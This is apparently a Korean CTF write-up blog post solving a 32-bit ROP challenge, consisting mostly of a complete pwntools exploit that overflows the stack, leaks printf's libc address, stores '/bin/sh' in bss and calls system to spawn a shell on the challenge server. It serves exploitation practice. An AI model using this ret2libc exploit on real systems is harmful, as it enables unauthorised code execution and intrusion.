이전에 했던 문제들과 크게 다를게 없기 때문에 쉽게 풀 수 있습니다.
printf 함수를 이용하여 printf 함수의 실제 주소를 출력시키고, vuln 함수를 다시 실행합니다.
payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])
p.sendlineafter(": ", payload)printf 함수의 실제 주소를 받고, libc base 를 구합니다.
printf = u32(p.recvuntil('\xf7'))
base = printf - libc.symbols['printf']
system = base + libc.symbols['system']/bin/sh를 bss에 넣습니다.
binsh = e.bss() + 0x10
payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])
p.sendline(payload)
p.sendline('/bin/sh\x00')system("/bin/sh")를 실행합니다.
payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)
p.sendline(payload)전체 코드
from pwn import *
context.log_level = 'debug'
#e = ELF('./leak_libc')
#p = process('./leak_libc')
e = ELF('./rop32')
p = remote("sunrin.site", 9003)
libc = ELF('./libc.so.6')
pdecimal = libc.search("%d\x00").next()
popret = 0x08048331
poppopret = 0x0804855a
pppret = 0x08048559
payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])
p.sendlineafter(": ", payload)
printf = u32(p.recvuntil('\xf7'))
base = printf - libc.symbols['printf']
system = base + libc.symbols['system']
binsh = e.bss() + 0x10
payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])
p.sendline(payload)
p.sendline('/bin/sh\x00')
payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)
p.sendline(payload)
p.interactive()728x90
'해킹 > writeup' 카테고리의 다른 글
| 18. sung.pw - ropasaurusrex (0) | 2021.08.01 |
|---|---|
| 17. sung.pw - rop32_v2 (0) | 2021.08.01 |
| 15. Dreamhack - basic_rop_x64 (0) | 2021.08.01 |
| 14. Dreamhack - basic_rop_x86 (0) | 2021.08.01 |
| 13. HackCTF - RTL_Core (0) | 2021.07.19 |